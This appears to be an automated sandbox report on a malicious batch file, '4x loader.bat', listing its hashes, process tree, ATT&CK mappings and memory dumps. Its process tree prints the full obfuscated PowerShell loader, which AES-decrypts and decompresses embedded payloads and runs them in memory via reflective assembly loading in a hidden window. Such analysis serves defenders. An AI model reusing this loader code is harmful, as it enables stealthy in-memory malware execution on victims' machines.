52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa

General

Target

4x loader.bat
Size

1.5MB
MD5

5b956910d7d28f6ee2ccb59d4c7b402f
SHA1

e99a814ba0a8824a2bb1625b4e2cb0aa828d26e1
SHA256

52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa
SHA512

1967ce3eb6344695012c1ebb3c78a2a86396c900783907b7f383bb60a40e622ce52af6b813d3cf17686edae560da6d61462fb1d5f7446114ab9a1c9e61e3f635
SSDEEP

24576:f69MXQh3D4FnZFRiMf4lPGj8rDm2Wum/j2EtY5ZYZu9C0AzBVG3e5Ql2jumGP:fwTSh3QG+Y9tNjQ

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1324 powershell.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1324 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1324 powershell.exe

pid	process
1324	powershell.exe

pid	process
1324	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1324	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exenet.exe

description	pid	process	target process
PID 2808 wrote to memory of 2084	2808	cmd.exe	net.exe
PID 2808 wrote to memory of 2084	2808	cmd.exe	net.exe
PID 2808 wrote to memory of 2084	2808	cmd.exe	net.exe
PID 2084 wrote to memory of 2248	2084	net.exe	net1.exe
PID 2084 wrote to memory of 2248	2084	net.exe	net1.exe
PID 2084 wrote to memory of 2248	2084	net.exe	net1.exe
PID 2808 wrote to memory of 2628	2808	cmd.exe	cmd.exe
PID 2808 wrote to memory of 2628	2808	cmd.exe	cmd.exe
PID 2808 wrote to memory of 2628	2808	cmd.exe	cmd.exe
PID 2808 wrote to memory of 1324	2808	cmd.exe	powershell.exe
PID 2808 wrote to memory of 1324	2808	cmd.exe	powershell.exe
PID 2808 wrote to memory of 1324	2808	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\4x loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QIZJ/fa36vhtj27ozFjL7g05WCcUpC8LyRKGfAzheCI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZVv8E75OjoswS6cd03dUWw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nLrzP=New-Object System.IO.MemoryStream(,$param_var); $ZuaJS=New-Object System.IO.MemoryStream; $UKkLU=New-Object System.IO.Compression.GZipStream($nLrzP, [IO.Compression.CompressionMode]::Decompress); $UKkLU.CopyTo($ZuaJS); $UKkLU.Dispose(); $nLrzP.Dispose(); $ZuaJS.Dispose(); $ZuaJS.ToArray();}function execute_function($param_var,$param2_var){ $PHFYc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SFSaA=$PHFYc.EntryPoint; $SFSaA.Invoke($null, $param2_var);}$yGKMo = 'C:\Users\Admin\AppData\Local\Temp\4x loader.bat';$host.UI.RawUI.WindowTitle = $yGKMo;$smymX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yGKMo).Split([Environment]::NewLine);foreach ($pgxRZ in $smymX) { if ($pgxRZ.StartsWith('KeyfbtTtfpIEwotnLZXq')) { $naPbf=$pgxRZ.Substring(20); break; }}$payloads_var=[string[]]$naPbf.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:2628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1324-4-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

Filesize
4KB

Download
memory/1324-6-0x000000001B3A0000-0x000000001B682000-memory.dmp

Filesize
2.9MB

Download
memory/1324-8-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download
memory/1324-7-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-5-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-12-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing